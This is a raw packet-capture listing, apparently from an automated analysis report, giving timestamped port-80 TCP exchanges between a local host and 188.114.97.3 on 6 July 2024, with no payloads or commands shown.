                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.682585001 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.682604074 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.682620049 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.682637930 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.682651043 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.682658911 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.772794962 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.772840023 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.772857904 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.772891998 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.772912979 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.772924900 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.772931099 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.772950888 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.772963047 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.772969007 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773005962 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773025036 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773027897 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773041964 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773078918 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773096085 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773188114 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773210049 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773226976 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773242950 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773246050 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773263931 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773264885 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773283958 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773298979 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773319006 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773757935 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773819923 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773888111 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773905993 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773955107 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773956060 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773972034 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.773988962 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774019957 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774044037 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774063110 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774117947 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774486065 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774538994 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774568081 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774584055 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774622917 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774719954 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774734974 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774751902 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774772882 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774796963 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774903059 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774919033 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774935007 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774966002 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.774992943 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.775387049 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.775439978 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.775443077 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.775460005 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.775501013 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.775544882 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.775562048 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.775578022 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.775603056 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.775619984 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.846956015 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.846997023 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847013950 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847068071 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847095966 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847445965 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847498894 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847515106 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847559929 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847584963 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847592115 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847609997 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847645044 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847666979 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847685099 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847701073 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847718000 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847748995 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847762108 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.847795963 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848076105 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848129034 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848144054 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848145008 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848181963 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848198891 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848243952 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848262072 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848278999 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848295927 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848315954 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848340988 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848423004 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848438978 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848453999 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848479986 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.848500967 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.863598108 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.863778114 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.999272108 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.999284029 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.999365091 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000475883 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000539064 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000544071 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000556946 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000582933 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000605106 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000634909 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000684023 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000742912 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000758886 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000770092 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000818968 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000956059 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000967979 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000979900 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.000992060 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001004934 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001017094 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001032114 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001046896 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001235962 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001285076 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001288891 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001296997 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001333952 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001373053 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001384974 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001395941 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001430035 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001444101 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001643896 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001696110 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001707077 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001718998 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001760006 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001832962 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001844883 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001856089 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001868010 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001889944 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001919985 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.001966000 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002017021 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002249956 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002300024 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002305984 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002317905 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002361059 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002418995 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002430916 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002440929 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002454042 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002475977 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002495050 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002665997 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002679110 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002690077 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002701044 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002717972 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002722979 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002746105 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.002768040 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.003163099 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.003215075 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.074853897 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.074914932 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.074934959 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.074945927 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.074970961 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075043917 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075051069 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075062990 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075073004 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075084925 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075165033 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075259924 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075273037 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075284004 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075295925 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075308084 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075320959 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075331926 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075349092 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075412989 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075903893 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075915098 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075927973 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075956106 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075970888 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075980902 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.075992107 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.076004028 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.076026917 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.076052904 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.076139927 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.076150894 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.076167107 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.076179028 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.076190948 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.076195955 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.076225996 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.076245070 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150116920 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150163889 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150177002 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150233030 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150250912 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150269032 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150295973 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150373936 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150424004 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150461912 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150475025 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150517941 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150551081 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150563002 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150573969 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150585890 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150609970 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150626898 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150742054 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150753021 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150783062 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150804043 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150830984 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150846004 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150859118 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.150892019 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151000023 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151010990 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151022911 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151036978 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151057959 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151092052 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151148081 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151160002 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151171923 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151185036 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151196003 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151206970 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151231050 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.151243925 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.169167995 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.180533886 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.361864090 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362153053 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362453938 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362508059 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362514019 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362525940 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362555981 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362569094 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362581968 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362632990 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362797022 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362807035 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362817049 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362827063 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362848043 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362876892 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362948895 CEST8049731188.114.97.3192.168.2.4
